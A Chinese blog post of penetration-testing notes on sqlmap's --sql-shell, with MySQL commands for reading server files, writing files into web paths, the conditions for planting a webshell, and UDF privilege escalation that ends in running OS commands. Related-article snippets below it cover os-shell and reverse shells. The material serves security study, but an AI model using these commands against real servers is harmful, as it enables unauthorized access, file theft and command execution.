sqlmap中的--sql-shell

已于 2022-10-25 17:35:23 修改
阅读量9.3k 收藏 22
点赞数 6
分类专栏: 笔记 文章标签: sql 数据库 mysql
于 2022-10-25 17:26:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45751902/article/details/127517553
版权

文章目录

命令

sqlmap -u --sql-shell

之后就和sql中的命令一样

文件路径

select @@datadir;

查看版本

select @@version;

读写文件

常见的找绝对路径方法:

网页报错信息
phpinfo、探针
数据库查询、暴力破解
参看:常用的绝对路径收集

查看php是否开启魔术引导

测试方法:
特殊字符测试是否转义成反斜杠
探针、phpinfo等

mysql写shell的条件
1、网站可访问路径的绝对路径
2、secure_file_priv 的值非NULL或包含了导出的绝对路径
secure_file_priv的值在mysql配置文件my.ini中设置,这个参数用来限制数据导入导出
Mysql>=5.5.53 默认为NULL,即默认禁止导入导出
Mysql<5.5.53 默认为空,即默认无限制
3、mysql服务有对网站可访问路径的写权限
4、mysql连接用户有FILE权限/ROOT用户或ROOT权限
5、GPC关闭//未对闭合用的引号转义
outfile 和 dumpfile的路径不支持hex,必须有引号包裹

# 高版本只允许操作secure_file_priv变量指定目录下的文件
select @@secure_file_priv;

# 写文件  
# into dumpfile用于二进制文件,
select unhex('hexcode') into dumpfile '/usr/lib64/mysql/plugin/mysqludf.so'; 
# into outfile 主要的目的是导出 文本文件
select '123' into outfile  /var/www/1.html;

#读文件
select load_file('/etc/httpd/conf/httpd.conf');

# 有的时候读取很慢 ,可以不读整个文件 下面先以DocumentRoot分割,获取查找第3个左边的部分
substring(substring_index(substring_index(load_file('/etc/httpd/conf/httpd.conf'),'DocumentRoot',3),'DocumentRoot',-1),1,20);

udf

#找到现有的自定义函数
select * from mysql.func;

#  MySQL 5.0.67 开始udf需要在指定路径下
select @@plugin_dir;

#导入udf库文件
select unhex('hexcode') into dumpfile '/usr/lib64/mysql/plugin/mysqludf.so';

#创建自定义函数
create function sys_eval returns string soname 'mysqludf.so';

# 执行自定义函数
select sys_eval('whoami');

下一步使用sqlmap --os-shell

可以执行命令
下图是网站的绝对路径
在这里插入图片描述

参考

安全渗透测试–sql注入之sql-shell

空白行
关注
专栏目录
sqlmapshell命令及步骤
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-12 2517
写一篇利用工具sqlmapshell的文章,网上已经有很多类似的文章了,感觉不是很详细,也是自己做个笔记再重温一遍sqlmapshell命令及步骤吧 sqlmap.py -u "http://192.168.3.50/2sqli-labs/Less-1/?id=1" --os-shell输入完语句之后首先会让你选择脚本类型,我这里是php的 接下来回车一下,又会出现4个选项(让你指定目录)我这个选择自定义目录,然后回车接下来输入网站的根路径会自动生成一个上传文件的地方成功写入2个shell,一个用来执行
sqlmap mysql shell_利用SQLmap 拿服务器shell
weixin_39528525的博客
01-27 2440
1、简介sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库MySQL,Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2,SQLite, Firebird, Sybase和SAP MaxDB。采用五种独特的SQL注入技术,分别是:1)基于布尔的盲注...
sqlmap-1.6.5-11_sqlmap-1.6.5-11
09-20
sqlmap-1.6.5-11 sql注入工具
shell执行sql命令并返回结果
最新发布
gaodi2002的博客
09-04 245
#!/bin/bash password=“xxxxxxx”kubectl -n xxxxns exec -it mysql-0-0 -- mysql -h10.1.5.1 -P3306 -u dbuser -Deip -p$password -e "select * from iptbs" | while read l...
sqlmap 如何 --os-shell 及反弹shell
weixin_63580357的博客
10-17 1205
从上面结果可以看出已经成功反弹 shell,不过这个 shell 操作起来不甚顺畅,可以在 Kali 生成反弹 shell 代码,借助上面生成的一个文件上传界面。就会通过上面这个php上传一个用于命令执行的tmpbylqf.php到网站路径下,让我们命令执行,并将输出的内容返回sqlmap端。来说,--os-shell的本质就是写入两个php文件,其的tmpugvzq.php可以让我们上传文件到网站路径下。-o shell.php:指定生成的payload文件的名称为shell.php。
sql注入到getshell (内附sqlmap的os-shell遇到文路径的解决办法)
hackzkaq的博客
12-23 3835
`搜索公众号:白帽子左一,每天更新技术干货! 作者:掌控安全学员——君叹 基本界面 试试看信息列表里面随便点一条看下网络请求 可以看到一个带有参数的请求,我们试着直接访问 直接访问的话能够看到直接的文章内容 尝试一下更改bti的值 试试直接用sqlmap跑 测试成功,存在sql注入 尝试参数 —os-shell 看看是否能拿到shell 成功getshell 但是我们执行命令默认都在’C:\Windows\system32’这个路径下 我们可以看到当我们执行e: 没有回显 再次执行chdi.
sqlmap os-shell原理
信安路上……
12-04 2707
sqlmap os-shell原理 0x01 流程 i. 简单判断 从截图显示,可以看到有以下几步 1、选择 web 应用语言 2、发现(提供)一个可写的绝对路径 3、顺序(不同方法)上传tmpujout.php、tmpbvwsp.php两个文件 ii. 流量分析 主要的http流量有 4 条,第 2 条根据@@version_compile_os首字母判断操作系统,第 4 ...
sqlmapshell
goddemon
06-20 3081
sqlmap5种思路拿shell总结 ①利用dump 管理员类的账户后进入进行站点后拿shell 或者拿到账户后远程连接进行连接进行udf类提取类拿shell #连接方法 sqlmap -d “mysql://admin:password@192.168.1.1:3306/security” admin是账号,psw是密码,后面是地址和端口,security数据库。我们数据库可以用current-db来查看 ②利用os-shellshell 条件①知绝对路径 ②管理员权限 ③开启 ③
sqlmap mysql udf提权_利用sqlmap命令--sql-shell进行mysql提权的小方法之udf提权
weixin_35861708的博客
01-19 1787
udf提权1.原理UDF提权是利用MYSQL的自定义函数功能,将MYSQL账号转化为系统system权限2.利用条件Mysql版本大于5.1版本udf.dll文件必须放置于MYSQL安装目录下的libplugin文件夹下。Mysql版本小于5.1版本。udf.dll文件在Windows2003下放置于c:windowssystem32,在windows2000下放置于c:winntsystem32...
SQLmap使用指南(包含使用SQLmap获取shell)
北冥同学的成长记录笔记
07-16 5204
Sqlmap是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。
Sqlmap注入参数/shell命令参数/通用参数/杂项参数
buffedon的博客
07-24 4563
Sqlmap参数汇总2指定url位置注入设置指定注入参数设置URI注入位置设置任意注入位置注入参数指定某种注入指定表名设置DNS攻击设置二次注入探测指纹信息DBMS信息获取sqlmap暴力破解数据文件读写读文件写文件shell命令--os-shell--os-pwn(结合msf)sql-shell注册表通用参数爬虫杂项参数 指定url位置注入 设置指定注入参数 在我们的 sqli-labs-master 的url一般都是一个参数id。但是有的url会有多个参数id,name等 sqlmap.py -u
sqlmap mysql shell,sqlmap --os-shell执行原理(mysql篇)
weixin_34965737的博客
03-27 1429
sqlmap --os-shell执行原理对于mysql数据库来说,--os-shell的本质就是写入两个shell文件,其的一个可以让我们用来执行命令,而另外一个,如果在网站访问的话,可以让我们可以上传文件。说到写入shell,就要说一下两个限制条件,首先,我们需要知道上传文件的两个限制条件,首先我们要知道网站的绝对路径(我们的shell写入到哪里),然后要有导入导出的权限。导入导出的权限在m...
sqlmap 如何 --os-shell 及反弹shell_sqlmapshell
2301_77033340的博客
04-12 1012
厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新**
sqlmap使用
blackguest07的博客
01-21 784
sqlma的使用文档
利用sqlmap写交互式shell
qq_57147160的博客
12-18 3263
首先我们必须找到渗透点,看一下靶机网站: 我们找一下注入点: 进行了报错,发现存在注入点: 随后我们使用sqlmap来进行操作: 随后我们来进行注入: 发现可以进行注入: 随后我们直接输入:--os-shell来进入shell平台。 这里选择4 php 其实在slqmap我们进行拿交互式shell也是需要一定的条件的,这里的条件就是需要知道网站的绝对路径。 这里的选择就是: 第一个就是使用存在的字典来进行爆破路径, 第二个就是手敲网站的路径,我们知道网站的
利用sqlmap交互式写shell
ChuMeng1999的博客
01-19 4391
目录预备知识了解Sqlmap实验目的实验环境实验步骤一使用sqlmap进行交互式写shell实验步骤二 预备知识 了解Sqlmap sqlmap是一款开源、功能强大的自动化SQL注入工具,支持Access,MySQL,Oracle,SQL Server,DB2等多种数据库。支持get,post,cookie注入,支持基于布尔的盲注,基于时间的盲注,错误回显注入,联合查询注入,堆查询注入等。 实验目的 通过该实验熟悉sqlmap常用的命令,完成交互式写shell。 实验环境 服务器:CentOS,IP地址:
SQL——shell命令
qq_36912885的博客
09-02 1878
8.0之后的sql毛病是真鸡多,把这些常用的命令的都记录下来。里面包含了从安装到使用,远程登录,密码,redis,等等乱七八糟的问题。
如何利用sqlmap--sql-shell
06-11
使用`--sql-shell`选项可以让你在目标数据库上执行任意的SQL语句。以下是使用`--sql-shell`选项的基本步骤: 1. 首先,使用SQLMap进行探测并确认数据库注入漏洞是否存在。可以使用以下命令进行探测: ``` sqlmap -u <target-URL> --dbs ``` 2. 确认存在注入漏洞之后,可以使用以下命令来获取数据库的所有表: ``` sqlmap -u <target-URL> -D <database-name> --tables ``` 其,`<database-name>`是你想要访问的数据库名称。 3. 根据需要选择你想要访问的表,并使用以下命令来获取表的所有列: ``` sqlmap -u <target-URL> -D <database-name> -T <table-name> --columns ``` 其,`<table-name>`是你想要访问的表名称。 4. 根据需要选择你想要访问的列,并使用以下命令来获取`--sql-shell`: ``` sqlmap -u <target-URL> -D <database-name> -T <table-name> -C <column-name> --sql-shell ``` 其,`<column-name>`是你想要访问的列名称。 5. 输入`--sql-shell`后,你将进入SQL Shell命令行提示符,此时你可以输入任意的SQL命令,并按回车键执行。例如: ``` mysql> SELECT * FROM users WHERE username='admin'; ``` 这个命令将返回名为`users`的表用户名为`admin`的行的所有数据。 请注意,这些命令只是SQLMap获取SQL Shell的基本用法。具体步骤取决于你想要访问的数据库和表。同时,需要强调的是,这种方法只适用于合法的授权情况下,任何未经授权的访问都是违法的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值